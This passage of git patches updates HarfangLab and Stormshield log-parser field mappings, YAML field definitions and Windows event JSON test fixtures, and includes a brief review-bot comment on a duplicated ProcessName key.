description: '' + name: action.properties.param20 + type: keyword + +action.properties.param21: + description: '' + name: action.properties.param21 + type: keyword + +action.properties.param22: + description: '' + name: action.properties.param22 + type: keyword + +action.properties.param3: + description: '' + name: action.properties.param3 + type: keyword + +action.properties.param4: + description: '' + name: action.properties.param4 + type: keyword + +action.properties.param5: + description: '' + name: action.properties.param5 + type: keyword + +action.properties.param6: + description: '' + name: action.properties.param6 + type: keyword + 
+action.properties.param7: + description: '' + name: action.properties.param7 + type: keyword + +action.properties.param8: + description: '' + name: action.properties.param8 + type: keyword + +action.properties.param9: + description: '' + name: action.properties.param9 + type: keyword + harfanglab.aggregation_key: description: The key to the events aggregation name: harfanglab.aggregation_key diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 7a3ceda3e..1ae78875b 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml 
@@ -268,13 +268,189 @@ stages:
 event.type: ["info"]
 event.provider: "{{json_event.message.source_name}}"
 event.code: "{{json_event.message.event_id|string}}"
- action.properties: "{{json_event.message.event_data}}"
 source.ip: "{{json_event.message.event_data.IpAddress}}"
 action.id: "{{json_event.message.event_id}}"
 user.name: "{{json_event.message.event_data.SubjectUserName}}"
 user.domain: "{{json_event.message.event_data.SubjectDomainName}}"
 user.target.name: "{{json_event.message.event_data.TargetUserName}}"
 user.target.domain: "{{json_event.message.event_data.TargetDomainName}}"
+ action.properties.ASsecurityintelligencecreationtime: "{{json_event.message.event_data.get('AS security intelligence creation time')}}"
+ action.properties.ASsecurityintelligenceversion: "{{json_event.message.event_data.get('AS security intelligence version')}}"
+ action.properties.AVsecurityintelligencecreationtime: "{{json_event.message.event_data.get('AV security intelligence creation time')}}"
+ action.properties.AVsecurityintelligenceversion: "{{json_event.message.event_data.get('AV security intelligence version')}}"
+ action.properties.AccessList: "{{json_event.message.event_data.get('AccessList')}}"
+ action.properties.AccessMask: "{{json_event.message.event_data.get('AccessMask')}}"
+ action.properties.AccessReason: "{{json_event.message.event_data.get('AccessReason')}}"
+ action.properties.ActionID: "{{json_event.message.event_data.get('Action ID')}}"
+ action.properties.ActionName: "{{json_event.message.event_data.get('Action Name')}}"
+ action.properties.AdditionalActionsID: "{{json_event.message.event_data.get('Additional Actions ID')}}"
+ action.properties.AdditionalActionsString: "{{json_event.message.event_data.get('Additional Actions String')}}"
+ action.properties.AuthenticationPackageName: "{{json_event.message.event_data.get('AuthenticationPackageName')}}"
+ action.properties.BMstate: "{{json_event.message.event_data.get('BM state')}}"
+ action.properties.CacheState: "{{json_event.message.event_data.get('CacheState')}}"
+ action.properties.CallerProcessId: "{{json_event.message.event_data.get('CallerProcessId')}}"
+ action.properties.CallerProcessName: "{{json_event.message.event_data.get('CallerProcessName')}}"
+ action.properties.CategoryID: "{{json_event.message.event_data.get('Category ID')}}"
+ action.properties.CategoryName: "{{json_event.message.event_data.get('Category Name')}}"
+ action.properties.ClientProcessId: "{{json_event.message.event_data.get('ClientProcessId')}}"
+ action.properties.ClientProcessStartKey: "{{json_event.message.event_data.get('ClientProcessStartKey')}}"
+ action.properties.DetectionID: "{{json_event.message.event_data.get('Detection ID')}}"
+ action.properties.DetectionTime: "{{json_event.message.event_data.get('Detection Time')}}"
+ action.properties.DetectionUser: "{{json_event.message.event_data.get('Detection User')}}"
+ action.properties.ElevatedToken: "{{json_event.message.event_data.get('ElevatedToken')}}"
+ action.properties.EngineVersion: "{{json_event.message.event_data.get('Engine Version')}}"
+ action.properties.Engineup-to-date: "{{json_event.message.event_data.get('Engine up-to-date')}}"
+ action.properties.Engineversion: "{{json_event.message.event_data.get('Engine version')}}"
+ action.properties.ErrorCode: "{{json_event.message.event_data.get('Error Code')}}"
+ action.properties.ErrorDescription: "{{json_event.message.event_data.get('Error Description')}}"
+ action.properties.ExecutionID: "{{json_event.message.event_data.get('Execution ID')}}"
+ action.properties.ExecutionName: "{{json_event.message.event_data.get('Execution Name')}}"
+ action.properties.FQDN: "{{json_event.message.event_data.get('FQDN')}}"
+ action.properties.FWLink: "{{json_event.message.event_data.get('FWLink')}}"
+ action.properties.FailureReason: "{{json_event.message.event_data.get('FailureReason')}}"
+ action.properties.FileNameBuffer: "{{json_event.message.event_data.get('FileNameBuffer')}}"
+ action.properties.FileNameLength: "{{json_event.message.event_data.get('FileNameLength')}}"
+ action.properties.Flags: "{{json_event.message.event_data.get('Flags')}}"
+ action.properties.Hash: "{{json_event.message.event_data.get('Hash')}}"
+ action.properties.HashSize: "{{json_event.message.event_data.get('Hash Size')}}"
+ action.properties.IOAVstate: "{{json_event.message.event_data.get('IOAV state')}}"
+ action.properties.ImpersonationLevel: "{{json_event.message.event_data.get('ImpersonationLevel')}}"
+ action.properties.IpAddress: "{{json_event.message.event_data.get('IpAddress')}}"
+ action.properties.IpPort: "{{json_event.message.event_data.get('IpPort')}}"
+ action.properties.IssuerName: "{{json_event.message.event_data.get('IssuerName')}}"
+ action.properties.IssuerNameLength: "{{json_event.message.event_data.get('IssuerNameLength')}}"
+ action.properties.IssuerTBSHash: "{{json_event.message.event_data.get('IssuerTBSHash')}}"
+ action.properties.IssuerTBSHashSize: "{{json_event.message.event_data.get('IssuerTBSHashSize')}}"
+ action.properties.KeyLength: "{{json_event.message.event_data.get('KeyLength')}}"
+ action.properties.LastASsecurityintelligenceage: "{{json_event.message.event_data.get('Last AS security intelligence age')}}"
+ action.properties.LastAVsecurityintelligenceage: "{{json_event.message.event_data.get('Last AV security intelligence age')}}"
+ action.properties.Lastfullscanage: "{{json_event.message.event_data.get('Last full scan age')}}"
+ action.properties.Lastfullscanendtime: "{{json_event.message.event_data.get('Last full scan end time')}}"
+ action.properties.Lastfullscansource: "{{json_event.message.event_data.get('Last full scan source')}}"
+ action.properties.Lastfullscanstarttime: "{{json_event.message.event_data.get('Last full scan start time')}}"
+ action.properties.Lastquickscanage: "{{json_event.message.event_data.get('Last quick scan age')}}"
+ action.properties.Lastquickscanendtime: "{{json_event.message.event_data.get('Last quick scan end time')}}"
+ action.properties.Lastquickscansource: "{{json_event.message.event_data.get('Last quick scan source')}}"
+ action.properties.Lastquickscanstarttime: "{{json_event.message.event_data.get('Last quick scan start time')}}"
+ action.properties.Latestengineversion: "{{json_event.message.event_data.get('Latest engine version')}}"
+ action.properties.Latestplatformversion: "{{json_event.message.event_data.get('Latest platform version')}}"
+ action.properties.LmPackageName: "{{json_event.message.event_data.get('LmPackageName')}}"
+ action.properties.LogonGuid: "{{json_event.message.event_data.get('LogonGuid')}}"
+ action.properties.LogonProcessName: "{{json_event.message.event_data.get('LogonProcessName')}}"
+ action.properties.LogonType: "{{json_event.message.event_data.get('LogonType')}}"
+ action.properties.NRIengineversion: "{{json_event.message.event_data.get('NRI engine version')}}"
+ action.properties.NRIsecurityintelligenceversion: "{{json_event.message.event_data.get('NRI security intelligence version')}}"
+ action.properties.NotValidAfter: "{{json_event.message.event_data.get('NotValidAfter')}}"
+ action.properties.NotValidBefore: "{{json_event.message.event_data.get('NotValidBefore')}}"
+ action.properties.OAstate: "{{json_event.message.event_data.get('OA state')}}"
+ action.properties.ObjectType: "{{json_event.message.event_data.get('ObjectType')}}"
+ action.properties.OriginID: "{{json_event.message.event_data.get('Origin ID')}}"
+ action.properties.OriginName: "{{json_event.message.event_data.get('Origin Name')}}"
+ action.properties.PageHash: "{{json_event.message.event_data.get('PageHash')}}"
+ action.properties.ParentProcessId: "{{json_event.message.event_data.get('ParentProcessId')}}"
+ action.properties.Path: "{{json_event.message.event_data.get('Path')}}"
+ action.properties.Platformup-to-date: "{{json_event.message.event_data.get('Platform up-to-date')}}"
+ action.properties.Platformversion: "{{json_event.message.event_data.get('Platform version')}}"
+ action.properties.PolicyBits: "{{json_event.message.event_data.get('PolicyBits')}}"
+ action.properties.PostCleanStatus: "{{json_event.message.event_data.get('Post Clean Status')}}"
+ action.properties.PreExecutionStatus: "{{json_event.message.event_data.get('Pre Execution Status')}}"
+ action.properties.ProcessName: "{{json_event.message.event_data.get('Process Name')}}"
+ action.properties.ProcessId: "{{json_event.message.event_data.get('ProcessId')}}"
+ action.properties.ProcessName: "{{json_event.message.event_data.get('ProcessName')}}"
+ action.properties.ProcessNameBuffer: "{{json_event.message.event_data.get('ProcessNameBuffer')}}"
+ action.properties.ProcessNameLength: "{{json_event.message.event_data.get('ProcessNameLength')}}"
+ action.properties.ProductName: "{{json_event.message.event_data.get('Product Name')}}"
+ action.properties.ProductVersion: "{{json_event.message.event_data.get('Product Version')}}"
+ action.properties.Productstatus: "{{json_event.message.event_data.get('Product status')}}"
+ action.properties.ProfileChanged: "{{json_event.message.event_data.get('ProfileChanged')}}"
+ action.properties.PublisherName: "{{json_event.message.event_data.get('PublisherName')}}"
+ action.properties.PublisherNameLength: "{{json_event.message.event_data.get('PublisherNameLength')}}"
+ action.properties.PublisherTBSHash: "{{json_event.message.event_data.get('PublisherTBSHash')}}"
+ action.properties.PublisherTBSHashSize: "{{json_event.message.event_data.get('PublisherTBSHashSize')}}"
+ action.properties.RTPstate: "{{json_event.message.event_data.get('RTP state')}}"
+ action.properties.RelativeTargetName: "{{json_event.message.event_data.get('RelativeTargetName')}}"
+ action.properties.RemediationUser: "{{json_event.message.event_data.get('Remediation User')}}"
+ action.properties.RequestedPolicy: "{{json_event.message.event_data.get('RequestedPolicy')}}"
+ action.properties.RequestedSigningLevel: "{{json_event.message.event_data.get('RequestedSigningLevel')}}"
+ action.properties.RestrictedAdminMode: "{{json_event.message.event_data.get('RestrictedAdminMode')}}"
+ action.properties.RpcCallClientLocality: "{{json_event.message.event_data.get('RpcCallClientLocality')}}"
+ action.properties.RuleId: "{{json_event.message.event_data.get('RuleId')}}"
+ action.properties.RuleName: "{{json_event.message.event_data.get('RuleName')}}"
+ action.properties.ScriptBlockText: "{{json_event.message.event_data.get('ScriptBlockText')}}"
+ action.properties.SecureRequired: "{{json_event.message.event_data.get('SecureRequired')}}"
+ action.properties.SecurityintelligenceVersion: "{{json_event.message.event_data.get('Security intelligence Version')}}"
+ action.properties.SeverityID: "{{json_event.message.event_data.get('Severity ID')}}"
+ action.properties.SeverityName: "{{json_event.message.event_data.get('Severity Name')}}"
+ action.properties.ShareLocalPath: "{{json_event.message.event_data.get('ShareLocalPath')}}"
+ action.properties.ShareName: "{{json_event.message.event_data.get('ShareName')}}"
+ action.properties.Signature: "{{json_event.message.event_data.get('Signature')}}"
+ action.properties.SignatureType: "{{json_event.message.event_data.get('SignatureType')}}"
+ action.properties.SourceID: "{{json_event.message.event_data.get('Source ID')}}"
+ action.properties.SourceName: "{{json_event.message.event_data.get('Source Name')}}"
+ action.properties.State: "{{json_event.message.event_data.get('State')}}"
+ action.properties.Status: "{{json_event.message.event_data.get('Status')}}"
+ action.properties.StatusCode: "{{json_event.message.event_data.get('Status Code')}}"
+ action.properties.StatusDescription: "{{json_event.message.event_data.get('Status Description')}}"
+ action.properties.SubStatus: "{{json_event.message.event_data.get('SubStatus')}}"
+ action.properties.SubjectDomainName: "{{json_event.message.event_data.get('SubjectDomainName')}}"
+ action.properties.SubjectLogonId: "{{json_event.message.event_data.get('SubjectLogonId')}}"
+ action.properties.SubjectUserName: "{{json_event.message.event_data.get('SubjectUserName')}}"
+ action.properties.SubjectUserSid: "{{json_event.message.event_data.get('SubjectUserSid')}}"
+ action.properties.TargetDomainName: "{{json_event.message.event_data.get('TargetDomainName')}}"
+ action.properties.TargetInfo: "{{json_event.message.event_data.get('TargetInfo')}}"
+ action.properties.TargetLinkedLogonId: "{{json_event.message.event_data.get('TargetLinkedLogonId')}}"
+ action.properties.TargetLogonGuid: "{{json_event.message.event_data.get('TargetLogonGuid')}}"
+ action.properties.TargetLogonId: "{{json_event.message.event_data.get('TargetLogonId')}}"
+ action.properties.TargetOutboundDomainName: "{{json_event.message.event_data.get('TargetOutboundDomainName')}}"
+ action.properties.TargetOutboundUserName: "{{json_event.message.event_data.get('TargetOutboundUserName')}}"
+ action.properties.TargetServerName: "{{json_event.message.event_data.get('TargetServerName')}}"
+ action.properties.TargetSid: "{{json_event.message.event_data.get('TargetSid')}}"
+ action.properties.TargetUserName: "{{json_event.message.event_data.get('TargetUserName')}}"
+ action.properties.TargetUserSid: "{{json_event.message.event_data.get('TargetUserSid')}}"
+ action.properties.TaskContent: "{{json_event.message.event_data.get('TaskContent')}}"
+ action.properties.TaskContentNew_Args: "{{json_event.message.event_data.get('TaskContentNew_Args')}}"
+ action.properties.TaskContentNew_Command: "{{json_event.message.event_data.get('TaskContentNew_Command')}}"
+ action.properties.TaskName: "{{json_event.message.event_data.get('TaskName')}}"
+ action.properties.ThreatID: "{{json_event.message.event_data.get('Threat ID')}}"
+ action.properties.ThreatName: "{{json_event.message.event_data.get('Threat Name')}}"
+ action.properties.TotalSignatureCount: "{{json_event.message.event_data.get('TotalSignatureCount')}}"
+ action.properties.TransmittedServices: "{{json_event.message.event_data.get('TransmittedServices')}}"
+ action.properties.TypeID: "{{json_event.message.event_data.get('Type ID')}}"
+ action.properties.TypeName: "{{json_event.message.event_data.get('Type Name')}}"
+ action.properties.Unused: "{{json_event.message.event_data.get('Unused')}}"
+ action.properties.Unused2: "{{json_event.message.event_data.get('Unused2')}}"
+ action.properties.Unused3: "{{json_event.message.event_data.get('Unused3')}}"
+ action.properties.Unused4: "{{json_event.message.event_data.get('Unused4')}}"
+ action.properties.Unused5: "{{json_event.message.event_data.get('Unused5')}}"
+ action.properties.Unused6: "{{json_event.message.event_data.get('Unused6')}}"
+ action.properties.ValidatedPolicy: "{{json_event.message.event_data.get('ValidatedPolicy')}}"
+ action.properties.ValidatedSigningLevel: "{{json_event.message.event_data.get('ValidatedSigningLevel')}}"
+ action.properties.VerificationError: "{{json_event.message.event_data.get('VerificationError')}}"
+ action.properties.VirtualAccount: "{{json_event.message.event_data.get('VirtualAccount')}}"
+ action.properties.WorkstationName: "{{json_event.message.event_data.get('WorkstationName')}}"
+ action.properties.param0: "{{json_event.message.event_data.get('param0')}}"
+ action.properties.param1: "{{json_event.message.event_data.get('param1')}}"
+ action.properties.param10: "{{json_event.message.event_data.get('param10')}}"
+ action.properties.param11: "{{json_event.message.event_data.get('param11')}}"
+ action.properties.param12: "{{json_event.message.event_data.get('param12')}}"
+ action.properties.param13: "{{json_event.message.event_data.get('param13')}}"
+ action.properties.param14: "{{json_event.message.event_data.get('param14')}}"
+ action.properties.param15: "{{json_event.message.event_data.get('param15')}}"
+ action.properties.param16: "{{json_event.message.event_data.get('param16')}}"
+ action.properties.param17: "{{json_event.message.event_data.get('param17')}}"
+ action.properties.param18: "{{json_event.message.event_data.get('param18')}}"
+ action.properties.param19: "{{json_event.message.event_data.get('param19')}}"
+ action.properties.param2: "{{json_event.message.event_data.get('param2')}}"
+ action.properties.param20: "{{json_event.message.event_data.get('param20')}}"
+ action.properties.param21: "{{json_event.message.event_data.get('param21')}}"
+ action.properties.param22: "{{json_event.message.event_data.get('param22')}}"
+ action.properties.param3: "{{json_event.message.event_data.get('param3')}}"
+ action.properties.param4: "{{json_event.message.event_data.get('param4')}}"
+ action.properties.param5: "{{json_event.message.event_data.get('param5')}}"
+ action.properties.param6: "{{json_event.message.event_data.get('param6')}}"
+ action.properties.param7: "{{json_event.message.event_data.get('param7')}}"
+ action.properties.param8: "{{json_event.message.event_data.get('param8')}}"
+ action.properties.param9: "{{json_event.message.event_data.get('param9')}}"
 action.properties.TaskContentNew_Command: "{{parse_task_info.message.Task.Actions.Exec.Command}}"
 action.properties.TaskContentNew_Args: "{{parse_task_info.message.Task.Actions.Exec.Arguments}}"
diff --git a/HarfangLab/harfanglab/tests/test_bug.json b/HarfangLab/harfanglab/tests/test_bug.json
index 51d847ee4..8c13cc324 100644
--- a/HarfangLab/harfanglab/tests/test_bug.json
+++ b/HarfangLab/harfanglab/tests/test_bug.json
@@ -16,7 +16,6 @@
 "action": {
 "id": 1001,
 "properties": {
- "param0": "",
 "param1": "0",
 "param10": "0",
 "param11": "8024500b",
@@ -24,13 +23,10 @@
 "param13": "{581473F3-A4DC-4D00-8245-D203EAA9B5A9}",
 "param14": "0",
 "param15": "C:\\Windows\\WindowsUpdate.log\r\nC:\\Windows\\SoftwareDistribution\\ReportingEvents.log",
- "param16": "",
- "param17": "",
 "param18": "0",
 "param19": "3e7b694e-4cf1-45cc-93ff-f30da6e8f683",
 "param2": "WindowsUpdateFailure3",
 "param20": "262144",
- "param21": "",
 "param3": "Non disponible",
 "param4": "0",
 "param5": "7.9.9600.19915",
diff --git a/HarfangLab/harfanglab/tests/wineeventlog-event.json b/HarfangLab/harfanglab/tests/wineeventlog-event.json
index 0468dab02..e1f2d3f70 100644
--- a/HarfangLab/harfanglab/tests/wineeventlog-event.json
+++ b/HarfangLab/harfanglab/tests/wineeventlog-event.json
@@ -28,27 +28,18 @@
 "IpAddress": "1.2.3.4",
 "IpPort": "17780",
 "KeyLength": "0",
- "LmPackageName": "-",
 "LogonGuid": "{7B5ACC17-5CED-4A2D-ABCB-BECAE6799395}",
 "LogonProcessName": "Kerbe",
 "LogonType": "3",
 "ProcessId": "0x0",
- "ProcessName": "-",
- "RestrictedAdminMode": "-",
- "SubjectDomainName": "-",
 "SubjectLogonId": "0x0",
- "SubjectUserName": "-",
 "SubjectUserSid": "S-1-0-0",
 "TargetDomainName": "example.org",
 "TargetLinkedLogonId": "0x0",
 "TargetLogonId": "0x6accabcc3",
- "TargetOutboundDomainName": "-",
- "TargetOutboundUserName": "-",
 "TargetUserName": "john.doe$",
 "TargetUserSid": "S-1-5-21-11111111111-111111111111-11111111-111",
- "TransmittedServices": "-",
- "VirtualAccount": "%%1843",
- "WorkstationName": "-"
+ "VirtualAccount": "%%1843"
 }
 },
 "agent": {
diff --git a/HarfangLab/harfanglab/tests/wineventlog2.json b/HarfangLab/harfanglab/tests/wineventlog2.json
index ca3f92c17..1d0131cbf 100644
--- a/HarfangLab/harfanglab/tests/wineventlog2.json
+++ b/HarfangLab/harfanglab/tests/wineventlog2.json
@@ -27,22 +27,15 @@
 "IpAddress": "166.88.151.58",
 "IpPort": "0",
 "KeyLength": "0",
- "LmPackageName": "-",
 "LogonProcessName": "NtLmSsp ",
 "LogonType": "3",
 "ProcessId": "0x0",
- "ProcessName": "-",
 "Status": "0xc000006d",
 "SubStatus": "0xc000006a",
- "SubjectDomainName": "-",
 "SubjectLogonId": "0x0",
- "SubjectUserName": "-",
 "SubjectUserSid": "S-1-0-0",
- "TargetDomainName": null,
 "TargetUserName": "ADMINISTRATOR",
- "TargetUserSid": "S-1-0-0",
- "TransmittedServices": "-",
- "WorkstationName": "-"
+ "TargetUserSid": "S-1-0-0"
 }
 },
 "agent": {
diff --git a/HarfangLab/harfanglab/tests/wineventlog3.json b/HarfangLab/harfanglab/tests/wineventlog3.json
index 5f8ce7a01..5af94e187 100644
--- a/HarfangLab/harfanglab/tests/wineventlog3.json
+++ b/HarfangLab/harfanglab/tests/wineventlog3.json
@@ -16,48 +16,39 @@
 "action": {
 "id": 1116,
 "properties": {
- "Action ID": "9",
- "Action Name": "Non applicable",
- "Additional Actions ID": "0",
- "Additional Actions String": "No additional actions required",
- "Category ID": "30",
- "Category Name": "Attaque",
- "Detection ID": "{2E51DC7F-A01D-4E9E-94C8-782C63D85C6E}",
- "Detection Time": "2022-01-03T05:44:57.284Z",
- "Detection User": "AUTORITE NT\\Syst\u00e8me",
- "Engine Version": "AM: 1.1.18800.4, NIS: 1.1.18800.4",
- "Error Code": "0x00000000",
- "Error Description": "L\u2019op\u00e9ration a r\u00e9ussi. ",
- "Execution ID": "1",
- "Execution Name": "Suspendu",
+ "ActionID": "9",
+ "ActionName": "Non applicable",
+ "AdditionalActionsID": "0",
+ "AdditionalActionsString": "No additional actions required",
+ "CategoryID": "30",
+ "CategoryName": "Attaque",
+ "DetectionID": "{2E51DC7F-A01D-4E9E-94C8-782C63D85C6E}",
+ "DetectionTime": "2022-01-03T05:44:57.284Z",
+ "DetectionUser": "AUTORITE NT\\Syst\u00e8me",
+ "EngineVersion": "AM: 1.1.18800.4, NIS: 1.1.18800.4",
+ "ErrorCode": "0x00000000",
+ "ErrorDescription": "L\u2019op\u00e9ration a r\u00e9ussi. ",
+ "ExecutionID": "1",
+ "ExecutionName": "Suspendu",
 "FWLink": "https://go.microsoft.com/fwlink/?linkid=37020&name=Exploit:O97M/CVE-2017-11882.SMK!MTB&threatid=2147772194&enterprise=0",
- "Origin ID": "1",
- "Origin Name": "Ordinateur local",
+ "OriginID": "1",
+ "OriginName": "Ordinateur local",
 "Path": "file:_C:\\Program Files\\Avast\\Amex\\temp\\TMMSG_45AD4A29-D7BD-AE8F-FFBC-4115652291C2",
- "Post Clean Status": "0",
- "Pre Execution Status": "0",
- "Process Name": "C:\\Program Files\\Avast\\Amex\\AMEX_secondary.exe",
- "Product Name": "Antivirus Microsoft Defender",
- "Product Version": "4.18.2111.5",
- "Remediation User": null,
- "Security intelligence Version": "AV: 1.355.1292.0, AS: 1.355.1292.0, NIS: 1.355.1292.0",
- "Severity ID": "5",
- "Severity Name": "Grave",
- "Source ID": "3",
- "Source Name": "Protection en temps r\u00e9el",
+ "PostCleanStatus": "0",
+ "PreExecutionStatus": "0",
+ "ProductName": "Antivirus Microsoft Defender",
+ "ProductVersion": "4.18.2111.5",
+ "SecurityintelligenceVersion": "AV: 1.355.1292.0, AS: 1.355.1292.0, NIS: 1.355.1292.0",
+ "SeverityID": "5",
+ "SeverityName": "Grave",
+ "SourceID": "3",
+ "SourceName": "Protection en temps r\u00e9el",
 "State": "1",
- "Status Code": "1",
- "Status Description": null,
- "Threat ID": "2147772194",
- "Threat Name": "Exploit:O97M/CVE-2017-11882.SMK",
- "Type ID": "0",
- "Type Name": "Concret",
- "Unused": null,
- "Unused2": null,
- "Unused3": null,
- "Unused4": null,
- "Unused5": null,
- "Unused6": null
+ "StatusCode": "1",
+ "ThreatID": "2147772194",
+ "ThreatName": "Exploit:O97M/CVE-2017-11882.SMK",
+ "TypeID": "0",
+ "TypeName": "Concret"
 }
 },
 "agent": {
diff --git a/HarfangLab/harfanglab/tests/wineventlog4.json b/HarfangLab/harfanglab/tests/wineventlog4.json
index 7e3ab3450..c8aff9945 100644
--- a/HarfangLab/harfanglab/tests/wineventlog4.json
+++ b/HarfangLab/harfanglab/tests/wineventlog4.json
@@ -18,12 +18,10 @@
 "properties": {
 "AccessList": "%%1538\n\t\t\t\t%%1541\n\t\t\t\t%%4416\n\t\t\t\t%%4417\n\t\t\t\t%%4418\n\t\t\t\t%%4419\n\t\t\t\t%%4420\n\t\t\t\t%%4423\n\t\t\t\t%%4424\n\t\t\t\t",
 "AccessMask": "0x12019f",
- "AccessReason": "-",
 "IpAddress": "10.84.128.186",
 "IpPort": "50846",
 "ObjectType": "File",
 "RelativeTargetName": "NETLOGON",
- "ShareLocalPath": null,
 "ShareName": "\\\\*\\IPC$",
 "SubjectDomainName": "AUTORITE NT",
 "SubjectLogonId": "0x3ad88f7f3",
From 18315760a88331377df466e61002299344057145 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Wed, 18 Sep 2024 16:02:27 +0200
Subject: [PATCH 056/317] fix(Harfanglab): fix duplicated fields
---
 HarfangLab/harfanglab/ingest/parser.yml | 5 +----
 HarfangLab/harfanglab/tests/wineventlog3.json | 1 +
 2 files changed, 2 insertions(+), 4 deletions(-)
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 1ae78875b..8a357b33f 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -354,9 +354,8 @@ stages:
 action.properties.PolicyBits: "{{json_event.message.event_data.get('PolicyBits')}}"
 action.properties.PostCleanStatus: "{{json_event.message.event_data.get('Post Clean Status')}}"
 action.properties.PreExecutionStatus: "{{json_event.message.event_data.get('Pre Execution Status')}}"
- action.properties.ProcessName: "{{json_event.message.event_data.get('Process Name')}}"
+ action.properties.ProcessName: "{{json_event.message.event_data.get('Process Name') or json_event.message.event_data.get('ProcessName')}}"
 action.properties.ProcessId: "{{json_event.message.event_data.get('ProcessId')}}"
- action.properties.ProcessName: "{{json_event.message.event_data.get('ProcessName')}}"
 action.properties.ProcessNameBuffer: "{{json_event.message.event_data.get('ProcessNameBuffer')}}"
 action.properties.ProcessNameLength: "{{json_event.message.event_data.get('ProcessNameLength')}}"
 action.properties.ProductName: "{{json_event.message.event_data.get('Product Name')}}"
@@ -408,8 +407,6 @@ stages:
 action.properties.TargetUserName: "{{json_event.message.event_data.get('TargetUserName')}}"
 action.properties.TargetUserSid: "{{json_event.message.event_data.get('TargetUserSid')}}"
 action.properties.TaskContent: "{{json_event.message.event_data.get('TaskContent')}}"
- action.properties.TaskContentNew_Args: "{{json_event.message.event_data.get('TaskContentNew_Args')}}"
- action.properties.TaskContentNew_Command: "{{json_event.message.event_data.get('TaskContentNew_Command')}}"
 action.properties.TaskName: "{{json_event.message.event_data.get('TaskName')}}"
 action.properties.ThreatID: "{{json_event.message.event_data.get('Threat ID')}}"
 action.properties.ThreatName: "{{json_event.message.event_data.get('Threat Name')}}"
diff --git a/HarfangLab/harfanglab/tests/wineventlog3.json b/HarfangLab/harfanglab/tests/wineventlog3.json
index 5af94e187..d8e4d1004 100644
--- a/HarfangLab/harfanglab/tests/wineventlog3.json
+++ b/HarfangLab/harfanglab/tests/wineventlog3.json
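Review bot: The merged `ProcessName` line in the first hunk relies on Jinja `or`, so a `None` or empty `'Process Name'` silently falls back to `'ProcessName'`; that precedence is the intent of the fix, but nothing on the line records why the same output field has two source spellings, and a later "cleanup" could easily reintroduce the duplicate key that YAML loaders typically resolve last-wins. I would add a comment above it such as `# 'Process Name' (Defender-style event_data, cf. the id 1116 fixture) and 'ProcessName' (logon/process events) are alternate spellings of the same field; keep a single key here`. The second hunk removes `TaskContentNew_Args`/`TaskContentNew_Command` from this `set` stage and appears to leave them to the `parse_task_info`-based assignments seen as context at the end of the earlier parser hunk; the fixture covering that event path should be checked to still assert both fields. The enclosing `set` stage starts and ends outside both hunks.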
@@ -36,6 +36,7 @@
 "Path": "file:_C:\\Program Files\\Avast\\Amex\\temp\\TMMSG_45AD4A29-D7BD-AE8F-FFBC-4115652291C2",
 "PostCleanStatus": "0",
 "PreExecutionStatus": "0",
+ "ProcessName": "C:\\Program Files\\Avast\\Amex\\AMEX_secondary.exe",
 "ProductName": "Antivirus Microsoft Defender",
 "ProductVersion": "4.18.2111.5",
 "SecurityintelligenceVersion": "AV: 1.355.1292.0, AS: 1.355.1292.0, NIS: 1.355.1292.0",
From fb5701bfa7f9fd878e63f99b6195fcdc5a9dca20 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Wed, 18 Sep 2024 18:35:03 +0200
Subject: [PATCH 057/317] fix(Stormshield): convert to camelcase the name of action.properties fields
---
 .../_meta/fields.yml | 168 +++++++++---------
 .../ingest/parser.yml | 74 ++++----
 .../tests/test_type_20048_1.json | 72 ++++----
 3 files changed, 157 insertions(+), 157 deletions(-)
diff --git a/Stormshield/stormshield-endpoint-security/_meta/fields.yml b/Stormshield/stormshield-endpoint-security/_meta/fields.yml
index e57a1d3d1..efff7013c 100644
--- a/Stormshield/stormshield-endpoint-security/_meta/fields.yml
+++ b/Stormshield/stormshield-endpoint-security/_meta/fields.yml
@@ -3,199 +3,199 @@ action.id: name: action.id type: keyword -action.properties.TargetCommandLine: - description: stormshield targeted process command line - name: action.properties.TargetCommandLine - type: keyword - -action.properties.TargetImage: - description: stormshield targeted process executable - name: action.properties.TargetImage - type: keyword - -action.properties.action_id: +action.properties.ActionId: description: stormshield property Action ID - name: action.properties.action_id + name: action.properties.ActionId type: keyword -action.properties.action_name: +action.properties.ActionName: description: stormshield property Action Name - name: action.properties.action_name + name: action.properties.ActionName type: keyword -action.properties.additional_actions_id: +action.properties.AdditionalActionsId: description: stormshield property Additional Actions ID - name: action.properties.additional_actions_id + name: action.properties.AdditionalActionsId type: keyword -action.properties.additional_actions_string: +action.properties.AdditionalActionsString: description: stormshield property Additional Actions String - name: action.properties.additional_actions_string + name: action.properties.AdditionalActionsString type: keyword -action.properties.category_id: +action.properties.CategoryId: description: stormshield property Category ID - name: action.properties.category_id + name: action.properties.CategoryId type: keyword -action.properties.category_name: +action.properties.CategoryName: description: stormshield property Category Name - name: action.properties.category_name + name: action.properties.CategoryName type: keyword -action.properties.detection_id: +action.properties.DetectionId: description: stormshield property Detection ID - name: action.properties.detection_id + name: action.properties.DetectionId type: keyword -action.properties.detection_time: +action.properties.DetectionTime: description: stormshield property Detection Time - name: 
action.properties.detection_time + name: action.properties.DetectionTime type: keyword -action.properties.detection_user: +action.properties.DetectionUser: description: stormshield property Detection User - name: action.properties.detection_user + name: action.properties.DetectionUser type: keyword -action.properties.engine_version: +action.properties.EngineVersion: description: stormshield property Engine Version - name: action.properties.engine_version + name: action.properties.EngineVersion type: keyword -action.properties.error_code: +action.properties.ErrorCode: description: stormshield property Error Code - name: action.properties.error_code + name: action.properties.ErrorCode type: keyword -action.properties.error_description: +action.properties.ErrorDescription: description: stormshield property Error Description - name: action.properties.error_description + name: action.properties.ErrorDescription type: keyword -action.properties.execution_id: +action.properties.ExecutionId: description: stormshield property Execution ID - name: action.properties.execution_id + name: action.properties.ExecutionId type: keyword -action.properties.execution_name: +action.properties.ExecutionName: description: stormshield property Execution Name - name: action.properties.execution_name + name: action.properties.ExecutionName type: keyword -action.properties.fwlink: +action.properties.Fwlink: description: stormshield property FWLink - name: action.properties.fwlink + name: action.properties.Fwlink type: keyword -action.properties.opcode: +action.properties.Opcode: description: stormshield action opcode - name: action.properties.opcode + name: action.properties.Opcode type: keyword 